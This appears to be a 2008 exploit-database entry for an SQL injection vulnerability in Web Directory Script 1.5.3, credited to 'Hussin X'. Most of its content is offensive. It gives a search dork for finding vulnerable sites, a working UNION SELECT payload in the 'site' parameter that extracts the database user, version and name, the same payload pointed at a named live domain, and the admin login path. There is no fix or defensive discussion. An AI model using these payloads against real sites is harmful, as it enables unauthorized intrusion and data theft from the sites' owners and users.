id: 3576
date: 08/30/2008
title: Web Directory Script 1.5.3 (site) SQL Injection Vulnerability
author: Hussin X
cves: 

=============================================================
Web Directory Script 1.5.3 (site) SQL Injection Vulnerability
=============================================================



|___________________________________________________|
|
| Web directory script v1.5.3 (site) Remote SQL Injection Vulnerability
|
|___________________________________________________
|---------------------Hussin X----------------------|
|
|    Author: Hussin X
|
|___________________________________________________
|                                                   |
|
| script : http://sourceworkshop.com/advanced_scripts/web_directory_script.html
|
| DorK   : "Powered by web directory script"
|___________________________________________________|

Exploit: 
________



www.[target].com/Script/index.php?command=open&site=-7+union+select+concat_ws(user(),version(),database())--




L!VE DEMO:
_________


http://links.sourceworkshop.com/index.php?command=open&site=-7+union+select+concat_ws(user(),version(),database())--




admin login

admin/index.php



#  0day.today [2023-03-22]  #